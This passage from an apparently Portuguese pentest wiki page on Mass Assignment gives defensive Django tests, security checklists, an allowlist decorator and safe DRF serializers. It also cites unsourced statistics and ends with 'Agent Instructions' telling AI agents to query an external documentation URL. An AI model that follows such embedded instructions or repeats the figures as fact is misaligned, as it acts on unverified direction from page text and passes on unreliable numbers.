            user = User.objects.get(username='newuser')
            self.assertNotEqual(user.role, 'admin')
            self.assertFalse(user.is_active)  # Deve ser False por padrão

# Executar testes
# pytest tests/test_mass_assignment.py -v
```

***

## 📋 Checklists de Segurança

### Checklist de Prevenção Mass Assignment

* [ ] **Validação de Input**
  * [ ] Whitelist explícita de campos permitidos
  * [ ] Rejeição de campos não esperados
  * [ ] Validação de tipo e formato de dados
  * [ ] Sanitização de entrada do usuário
* [ ] **Configuração de Framework**
  * [ ] Strong parameters habilitados (Rails)
  * [ ] DTOs/Forms utilizados (Spring/Django)
  * [ ] Serializers com campos explícitos (DRF)
  * [ ] Configuração segura de ORM
* [ ] **Lógica de Aplicação**
  * [ ] Campos sensíveis com valores padrão seguros
  * [ ] Verificação de permissões para campos críticos
  * [ ] Separação entre modelos de domínio e DTOs
  * [ ] Validação de regras de negócio
* [ ] **Monitoramento e Auditoria**
  * [ ] Logging de tentativas de Mass Assignment
  * [ ] Alertas para atividades suspeitas
  * [ ] Auditoria de modificações em campos sensíveis
  * [ ] Revisão regular de controles de acesso

### Checklist de Auditoria de Código

* [ ] **Análise de Controladores**
  * [ ] Verificar uso de `params.permit!` (Rails)
  * [ ] Identificar `@ModelAttribute` sem validação (Spring)
  * [ ] Revisar `form.save()` sem whitelist (Django)
  * [ ] Analisar `req.body` direto em updates (Node.js)
* [ ] **Revisão de Modelos**
  * [ ] Verificar campos sensíveis no modelo
  * [ ] Analisar valores padrão de campos críticos
  * [ ] Revisar relacionamentos e associações
  * [ ] Verificar proteções no nível de banco
* [ ] **Testes de Segurança**
  * [ ] Testar criação com campos extras
  * [ ] Verificar atualização com campos sensíveis
  * [ ] Testar diferentes métodos HTTP
  * [ ] Validar diferentes content-types

### Checklist de Resposta a Incidentes

* [ ] **Detecção**
  * [ ] Analisar logs de modificações suspeitas
  * [ ] Verificar usuários com privilégios elevados
  * [ ] Identificar mudanças anormais em dados
  * [ ] Monitorar padrões de requisição incomuns
* [ ] **Contenção**
  * [ ] Reverter modificações maliciosas
  * [ ] Revogar privilégios elevados indevidos
  * [ ] Bloquear contas comprometidas
  * [ ] Implementar whitelists imediatas
* [ ] **Correção**
  * [ ] Aplicar strong parameters/DTOs
  * [ ] Implementar validação em múltiplas camadas
  * [ ] Atualizar configurações de framework
  * [ ] Revisar e testar todas as endpoints

***

## 📊 Exemplos de Implementação Segura

### Sistema Completo de Proteção

```python
# security/mass_assignment_protection.py
from functools import wraps
from django.core.exceptions import PermissionDenied
import logging

logger = logging.getLogger('mass_assignment_protection')

class MassAssignmentProtector:
    """
    Sistema abrangente de proteção contra Mass Assignment
    """
    
    def __init__(self):
        self.sensitive_fields = self.load_sensitive_fields()
        self.allowed_fields_by_endpoint = self.load_field_whitelists()
    
    def load_sensitive_fields(self):
        """Carregar lista de campos sensíveis"""
        return {
            'user': ['is_staff', 'is_superuser', 'is_active', 'groups', 'user_permissions'],
            'product': ['price', 'cost', 'inventory_count', 'published'],
            'order': ['total_amount', 'status', 'payment_status', 'user_id'],
            'settings': ['*']  # Todos os campos são sensíveis
        }
    
    def load_field_whitelists(self):
        """Carregar whitelists por endpoint"""
        return {
            'user_registration': ['username', 'password', 'email', 'first_name', 'last_name'],
            'user_profile_update': ['first_name', 'last_name', 'email', 'bio', 'avatar'],
            'product_create': ['name', 'description', 'category'],
            'product_update': ['name', 'description', 'category']
        }
    
    def protect_endpoint(self, endpoint_name, model_name=None):
        """
        Decorator para proteger endpoints contra Mass Assignment
        """
        def decorator(view_func):
            @wraps(view_func)
            def wrapper(request, *args, **kwargs):
                if request.method in ['POST', 'PUT', 'PATCH']:
                    try:
                        self.validate_request_data(
                            request, 
                            endpoint_name, 
                            model_name
                        )
                    except SecurityViolation as e:
                        logger.warning(
                            f"Tentativa de Mass Assignment bloqueada: {e} "
                            f"IP: {self.get_client_ip(request)} "
                            f"User: {request.user.id if request.user.is_authenticated else 'anonymous'}"
                        )
                        raise PermissionDenied("Operação não permitida")
                
                return view_func(request, *args, **kwargs)
            return wrapper
        return decorator
    
    def validate_request_data(self, request, endpoint_name, model_name):
        """Validar dados da requisição"""
        data = self.get_request_data(request)
        
        if not data:
            return
        
        # Obter whitelist para este endpoint
        allowed_fields = self.allowed_fields_by_endpoint.get(endpoint_name, [])
        
        if not allowed_fields:
            raise SecurityViolation(f"Nenhuma whitelist definida para {endpoint_name}")
        
        # Verificar campos não permitidos
        invalid_fields = [
            field for field in data.keys() 
            if field not in allowed_fields
        ]
        
        if invalid_fields:
            raise SecurityViolation(
                f"Campos não permitidos em {endpoint_name}: {invalid_fields}"
            )
        
        # Verificar campos sensíveis se modelo foi especificado
        if model_name and model_name in self.sensitive_fields:
            sensitive_fields_present = [
                field for field in data.keys()
                if field in self.sensitive_fields[model_name]
            ]
            
            if sensitive_fields_present:
                # Campos sensíveis exigem verificação adicional
                if not self.has_permission_for_sensitive_fields(request, model_name):
                    raise SecurityViolation(
                        f"Sem permissão para campos sensíveis: {sensitive_fields_present}"
                    )

class SecurityViolation(Exception):
    """Exceção para violações de segurança de Mass Assignment"""
    pass

# Uso em views
protector = MassAssignmentProtector()

@protector.protect_endpoint('user_profile_update', 'user')
def update_user_profile(request):
    # Esta view está automaticamente protegida
    pass

@protector.protect_endpoint('product_create', 'product')  
def create_product(request):
    # Protegida contra Mass Assignment
    pass
```

### Configuração de API Segura

```python
# api/serializers.py - Django REST Framework
from rest_framework import serializers
from django.contrib.auth.models import User
from .models import Product, Order

class UserRegistrationSerializer(serializers.ModelSerializer):
    password = serializers.CharField(write_only=True)
    
    class Meta:
        model = User
        fields = ['username', 'password', 'email', 'first_name', 'last_name']
    
    def create(self, validated_data):
        # ✅ Garantir valores padrão seguros
        validated_data['is_active'] = False
        validated_data['is_staff'] = False
        validated_data['is_superuser'] = False
        
        user = User.objects.create_user(**validated_data)
        return user

class UserProfileSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = ['first_name', 'last_name', 'email', 'date_joined']
        read_only_fields = ['date_joined']  # ✅ Campos apenas leitura

class ProductSerializer(serializers.ModelSerializer):
    class Meta:
        model = Product
        fields = ['id', 'name', 'description', 'price', 'category', 'created_at']
        read_only_fields = ['id', 'created_at', 'price']  # ✅ Preço é read-only
    
    def validate(self, data):
        # ✅ Validação adicional de negócio
        if 'price' in data and data['price'] <= 0:
            raise serializers.ValidationError("Price must be positive")
        return data

class OrderCreateSerializer(serializers.ModelSerializer):
    class Meta:
        model = Order
        fields = ['items', 'shipping_address']  # ✅ Apenas campos necessários
    
    def create(self, validated_data):
        # ✅ Definir campos automaticamente
        validated_data['user'] = self.context['request'].user
        validated_data['status'] = 'pending'
        validated_data['total_amount'] = self.calculate_total(validated_data['items'])
        
        return super().create(validated_data)

# api/views.py
from rest_framework import generics, permissions
from .serializers import UserRegistrationSerializer, UserProfileSerializer

class UserRegistrationView(generics.CreateAPIView):
    serializer_class = UserRegistrationSerializer
    permission_classes = [permissions.AllowAny]

class UserProfileView(generics.RetrieveUpdateAPIView):
    serializer_class = UserProfileSerializer
    permission_classes = [permissions.IsAuthenticated]
    
    def get_object(self):
        return self.request.user
```

***

## ⚠️ Considerações Finais

### Mitos Comuns sobre Mass Assignment

* ❌ "Meu framework previne Mass Assignment" → **FALSO** (a maioria requer configuração explícita)
* ❌ "É óbvio quais campos são sensíveis" → **FALSO** (contexto de negócio define sensibilidade)
* ❌ "APIs internas não precisam de proteção" → **FALSO** (APIs internas são alvos frequentes)
* ❌ "Validação no frontend é suficiente" → **FALSO** (ataques bypassam frontend)

### Estatísticas Importantes

```
- 30% das aplicações web possuem vulnerabilidades de Mass Assignment
- 60% dos desenvolvedores desconhecem os riscos
- Tempo médio para exploração: 2-8 horas
- Impacto médio em negócio: $45,000 por incidente
```

### Boas Práticas Essenciais

1. **Whitelist Over Blacklist**: Sempre especificar campos permitidos, não bloquear os proibidos
2. **Principle of Least Privilege**: Usuários só devem modificar campos necessários para sua operação
3. **Defense in Depth**: Múltiplas camadas de validação (frontend, backend, banco)
4. **Security by Default**: Campos sensíveis com valores padrão seguros

### Referências e Padrões

* OWASP Mass Assignment Cheat Sheet
* Rails Security Guide - Mass Assignment
* Spring Security Reference - Data Binding
* Django Security Topics - ModelForms

**🔐 Lembre-se**: Mass Assignment é uma vulnerabilidade de design que explora a conveniência dos frameworks modernos. Sempre questione "quais campos este usuário deveria poder modificar?" e implemente whitelists explícitas. A segurança deve ser intencional, não acidental.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xmorte.gitbook.io/bibliadopentestbr/tecnicas/web/server-side-infraestrutura-web/mass-assignment.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
